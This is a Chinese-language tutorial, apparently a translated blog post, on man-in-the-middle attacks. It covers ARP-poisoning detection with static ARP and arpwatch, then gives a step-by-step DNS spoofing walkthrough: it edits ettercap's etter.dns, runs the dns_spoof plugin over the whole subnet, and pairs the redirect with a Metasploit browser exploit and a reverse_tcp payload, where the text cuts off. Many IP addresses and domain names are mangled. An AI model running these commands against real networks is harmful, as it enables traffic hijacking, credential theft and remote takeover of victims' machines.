中間人攻擊之DNS欺騙

1、中間人攻擊-DNS欺騙在前面的文章（中間人攻擊-ARP毒化）中，我們討論了黑客危險(xiǎn)的攻擊和實(shí)用的ARP中毒原理。在本文中，我將首先探討檢測(cè)和防止ARP中毒（或ARP欺騙）攻擊，然后我將回顧其他的中間人攻擊-DNS欺騙。ARP緩存攻擊是一項(xiàng)非常危險(xiǎn)的攻擊，重要的是在用戶(hù)中創(chuàng)建安全的意識(shí)和分析有效的工具和策略。如果你操作的是小型網(wǎng)絡(luò)，那么就很容易維護(hù)ARP。但是在大型的網(wǎng)絡(luò)，維護(hù)ARP是很困難和費(fèi)事的。在前一篇文章的最后我們討論了工具和技術(shù)，能夠被用來(lái)檢測(cè)ARP緩存中毒攻擊。讓我們來(lái)回顧下每一步:  靜態(tài)ARP你可以在網(wǎng)絡(luò)ARP表中手動(dòng)的添加一些信息，一旦信息插入，你就有了靜態(tài)

2、ARP映射。輸入數(shù)據(jù)的過(guò)程也是非常簡(jiǎn)單，在你的終端/CMS中，只需輸入：“arp -s”例子：你現(xiàn)在的ARP表：rootbt:# arpAddress HWtype HWaddress Flags Mask Iface ether 00:22:93:cf:eb:6d C eth0讓我們假設(shè)一下，我想添加一個(gè)新的主機(jī)在我的ARP緩存表中，我輸入如下命令：arp -s IP MACrootbt:# arp -s 00:50:FC:A8:36:F5rootbt:# arpAddress HWtype HWaddress Flags Mask Iface1

3、 ether 00:50:fc:a8:36:f5 CM eth0 ether 00:22:93:cf:eb:6d C eth0rootbt:#需要注意的是，手動(dòng)添加ARP表只適用于當(dāng)前的會(huì)話(huà)。當(dāng)你重新啟動(dòng)計(jì)算機(jī)，將更新表。如果你想要使用這種方法，那么你可以創(chuàng)建一個(gè)批處理文件/BASH文件，并將它們添加到啟動(dòng)項(xiàng)。ARPwatch(ps：監(jiān)聽(tīng)ARP記錄)這是一個(gè)不錯(cuò)的實(shí)用程序，已經(jīng)被用來(lái)監(jiān)測(cè)ARP網(wǎng)絡(luò)，它能夠探測(cè)并記錄發(fā)生更改的網(wǎng)絡(luò)，同時(shí)還發(fā)送郵箱詳細(xì)說(shuō)明各自的變化。安裝過(guò)程也是非常簡(jiǎn)單的。對(duì)于Ubuntu用戶(hù)：# apt-get install arpw

4、atchrootbt:# arpwatch -hVersion 2.1a15usage: arpwatch -dN -f datafile -i interface -n net/width -r file -s sendmail_path -p -a -m addr -u username -R seconds  -Q -z ignorenet/ignoremask如果需要快速檢測(cè)就用下面這個(gè)命令：# arpwatch -i interface rootbt:# arpwa

5、tch -i eth0檢查程序是否在運(yùn)行：rootbt:# ps -ef | grep arpwatcharpwatch 1041 1 0 14:05 ? 00:00:00 /usr/sbin/arpwatch -u arpwatch -N -proot 2191 2165 0 14:54 pts/0 00:00:00 grep color=auto arpwatch接下來(lái)的步驟就是ARPwatch記錄日志，這也非常簡(jiǎn)單，你只需要做得是確定目錄，然后讀取文件。rootbt:# cd /var/lib/arpwatchrootbt:/var/lib/arpwatch

6、# lsarp.dat arp.dat-rootbt:/var/lib/arpwatch# cat arp.dat00:50:fc:a8:36:f5       1337437776        eth000:27:0e:21:a6:1e       1337437923        eth0所以如果你是網(wǎng)絡(luò)管理員，那么你應(yīng)該實(shí)施一些策略來(lái)監(jiān)視A

7、RP表并且保護(hù)主機(jī)免受ARP中毒攻擊。當(dāng)然我們要注意，中間人攻擊并不局限于一個(gè)ARP欺騙攻擊。正如前面提到的，還有許多其他的技術(shù)能夠執(zhí)行一個(gè)中間人攻擊。一個(gè)主要的例子就是DNS欺騙，我們將分析它。DNS欺騙攻擊DNS欺騙攻擊是一種非常危險(xiǎn)的中間人攻擊，它容易被攻擊者利用并且竊取用戶(hù)的機(jī)密信息。雖然這篇文章可以提供一些新的見(jiàn)解，但重要的是DNS欺騙是一個(gè)一般概念，有無(wú)數(shù)種方法可以實(shí)現(xiàn)一個(gè)DNS欺騙攻擊。在一個(gè)DNS欺騙攻擊中，攻擊者可以利用一個(gè)漏洞來(lái)偽造網(wǎng)絡(luò)流量。因此，要理解DNS欺騙攻擊，必須理解DNS是怎樣工作的。DNS(域名系統(tǒng))在互聯(lián)網(wǎng)中是一個(gè)非常重要的協(xié)議。它屬于TCP/IP，是一個(gè)分

8、層結(jié)構(gòu)的分布式模塊，它包含域名的相關(guān)信息。它負(fù)責(zé)在網(wǎng)絡(luò)上映射域名到他們各自的IP上。DNS定位主機(jī)/服務(wù)器通過(guò)查看友好域名，使用域名系統(tǒng)，DNS將域名和IP地址相互映射 。這些設(shè)備（路由器、服務(wù)器等）連接到你的電腦不能理解一些友好的名稱(chēng) （),他們只了解一個(gè)IP地址，而DNS負(fù)責(zé)翻譯它。讓我們來(lái)看看下面這個(gè)圖來(lái)理解主機(jī)和本地DNS服務(wù)器的正常通信。DNS服務(wù)器包含著一個(gè)主數(shù)據(jù)庫(kù)，其中包括信息的IP地址，因?yàn)檫@涉及到相應(yīng)的域名。所以在這些正常的通信中，一個(gè)主機(jī)發(fā)送請(qǐng)求到服務(wù)器，之后服務(wù)器響應(yīng)正確的信息。如果DNS沒(méi)有信息傳入的請(qǐng)求，它將發(fā)送請(qǐng)求到外部DNS服務(wù)器來(lái)獲取正確的響

9、應(yīng)。那么攻擊者如何使用中間人攻擊來(lái)實(shí)施DNS欺騙呢？下圖說(shuō)明了答案：使用DNS欺騙中間人攻擊，攻擊者將截取會(huì)話(huà)，然后轉(zhuǎn)移到一個(gè)假網(wǎng)站的會(huì)話(huà)。假如：用戶(hù)希望訪(fǎng)問(wèn)，并且谷歌的IP地址為7，攻擊者就可以使用DNS欺騙技術(shù)攔截會(huì)話(huà)，并將用戶(hù)重定向到假冒的網(wǎng)站，假網(wǎng)站IP可以為任意IP。演示DNS欺騙攻擊在本系列的以前文章中我發(fā)現(xiàn)ettercap是一個(gè)很好用來(lái)演示ARP欺騙攻擊的工具。當(dāng)然ettercap包含一個(gè)DNS插件，非常容易使用哦。打開(kāi)ettercap GUI，點(diǎn)擊"sniff"，之后再"unified sniffing"選擇自己的

10、網(wǎng)絡(luò)。單機(jī)hosts，之后掃描整個(gè)子網(wǎng)存活的主機(jī)。在執(zhí)行時(shí)，我們來(lái)編輯etter.dns文件，以確保它執(zhí)行正確的DNS欺騙攻擊：microsoft sucks ;)# redirect it to # A 6* A 6 PTR 6 # Wildcards in PTR are not allowed默認(rèn)情況下，ettercap是重定向到另一個(gè)網(wǎng)站的IP地址，我們來(lái)改變它： A 2* A 2 PTR 2 # Wildcards

11、in PTR are not allowed2是攻擊者的IP地址。確保Web服務(wù)器運(yùn)行在攻擊者的機(jī)器，一定要啟用IP轉(zhuǎn)發(fā)。 在受害者的電腦查看：C:>ping Pinging 01 with 32 bytes of data:Reply from 0: bytes=32 time=167ms TTL=54>Reply from 0: bytes=32 time=167ms TTL=54Reply from 0: bytes=32 time=167ms TTL=54Ping

12、 statistics for 0Packets: Sent = 4, Received = 4, Lost = 0 <0% loss>,在ettercap GUI上，選擇受害者主機(jī)（目標(biāo)1）和默認(rèn)路由器（網(wǎng)關(guān),目標(biāo)2）。點(diǎn)擊Mitm-ARP poisoning，選擇"Sniff remote connerctions."之后點(diǎn)擊 "start"-"start sniffing"點(diǎn)擊選擇"plugins"-"manage the plugins"

13、0;在其中選擇dns_spoof。這將會(huì)啟用dns_spoof插件來(lái)執(zhí)行DNS欺騙中間人攻擊?，F(xiàn)在在受害者電腦的DNS欺騙攻擊是：你可以看到，在DNS已經(jīng)成功欺騙時(shí)，所有會(huì)話(huà)被轉(zhuǎn)移到了攻擊者的主機(jī)，而不是真正的微軟服務(wù)器。這個(gè)演示是基于GUI的ettercap，你也可以使用命令行版本。讓我們考慮一個(gè)快速演示DNS欺騙的命令行接口。選擇etter。查看Dns使用簡(jiǎn)單的命令：rootbt:# locate etter.dns/usr/local/share/videojak/etter.dns/usr/share/ettercap/etter.dnsrootbt:#現(xiàn)在你可以使用你喜歡的文本編輯器

14、來(lái)編輯這個(gè)文件。你可以使用文本編輯器nano或者其他任何你想要的rootbt:# gedit /usr/share/ettercap/etter.dnsrootbt:# nano /usr/share/ettercap/etter.dns當(dāng)你完成了保存這個(gè)文件，現(xiàn)在做好了準(zhǔn)備。我們需要做得就是通過(guò)ettercap啟用DNS欺騙攻擊:rootbt:# ettercap -T -q -P dns_spoof -M arp / /ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGAListening on eth0.

15、 (Ethernet)eth0 ->    00:1C:23:42:8D:04 2 SSL dissection needs a valid 'redir_command_on' script in the etter.conf filePrivileges dropped to UID 65534 GID 65534.28 plugins39 protocol dissectors53 ports monitored7587 mac vendor fingerprint1698 tc

16、p OS fingerprint2183 known servicesRandomizing 255 hosts for scanning.Scanning the whole netmask for 255 hosts.* |=>| 100.00 %4 hosts added to the hosts list.ARP poisoning victims:GROUP 1 : ANY (all the hosts in the list)GROUP 2 : ANY (all the hosts in the list)Starting Unified sniffing.Text

17、 only Interface activated.Hit 'h' for inline helpActivating dns_spoof plugin.讓我們來(lái)拆開(kāi)命令結(jié)構(gòu)，來(lái)分析DNS欺騙攻擊所用到的命令：· -P  使用插件，這里我們使用的是dns_spoof· -T 使用基于文本界面· -q  啟動(dòng)安靜模式（不回顯的意思）· -M 啟動(dòng)ARP欺騙攻擊· / /  代表欺騙整個(gè)子網(wǎng)網(wǎng)絡(luò)此外，我們可以綜合使用這些命令。例如，你想要欺騙一個(gè)特定的受

18、害主機(jī)，那么你可以使用受害者的IP來(lái)執(zhí)行DNS欺騙攻擊。rootbt:# ettercap -T -q  /ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGAListening on eth0. (Ethernet)eth0 ->    00:1C:23:42:8D:04 2 SSL dissection needs a valid 'redir_command_on' script in the e

19、tter.conf filePrivileges dropped to UID 65534 GID 65534.28 plugins39 protocol dissectors53 ports monitored7587 mac vendor fingerprint1698 tcp OS fingerprint2183 known servicesRandomizing 255 hosts for scanning.Scanning the whole netmask for 255 hosts.* |=>| 100.00 %4 hosts added to the hosts

20、 list.ARP poisoning victims:GROUP 1 : 00:16:41:ED:6A:D0在另一個(gè)例子中，你可以使用特定的接口來(lái)執(zhí)行dns欺騙攻擊。為此，可以使用如下命令：rootbt:# ettercap -T -q -i eth0 -P dns_spoof -M arp / /DNS欺騙是一種非常危險(xiǎn)的攻擊，因?yàn)楣粽呖梢岳胑ttercap的dns_spoof插件和其他工具執(zhí)行攻擊。最終，攻擊者可以使用一個(gè)社會(huì)工程工具包（作者這里指的應(yīng)該是SET了）來(lái)執(zhí)行攻擊去控制受害者的電腦。想象一下這是多少容易，通過(guò)社會(huì)工程工

21、具包和DNS欺騙技術(shù)你所需要做得就是配置你的社會(huì)工程工具包和你的IP清單，制作像谷歌一樣的網(wǎng)站欺騙域名到你的IP地址上。當(dāng)受害者打開(kāi)google，你的攻擊將使它訪(fǎng)問(wèn)你的IP，之后建立一個(gè)遠(yuǎn)程的會(huì)話(huà)。讓我們來(lái)考慮一個(gè)示例場(chǎng)景：下面是是metasploit 滲透工具使用ettercap進(jìn)行dns欺騙。選擇你想要的exploit，在payload中我們就選擇 reverse_tcp：rootbt:# msfconsoleo 8 o o8 8 8ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P8' 8

22、8 8oooo8 8 .oooo8 Yb. 8 8 8 8 8 8 88 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 88 8 8 Yooo' 8 YooP8 YooP' 8YooP' 8 YooP' 8 8.:.:.:.:.:.:.:8.:.:.:.:.:8:= metasploit v3.7.0-release core:3.7 api:1.0+ - -= 684 exploits - 355 auxiliary+ - -= 217 payloads - 27 encoders - 8 nopsmsf > use windows/browser/ms10_046_shortcut_icon_dllloadermsf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 2SRVHOST => 2msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD wi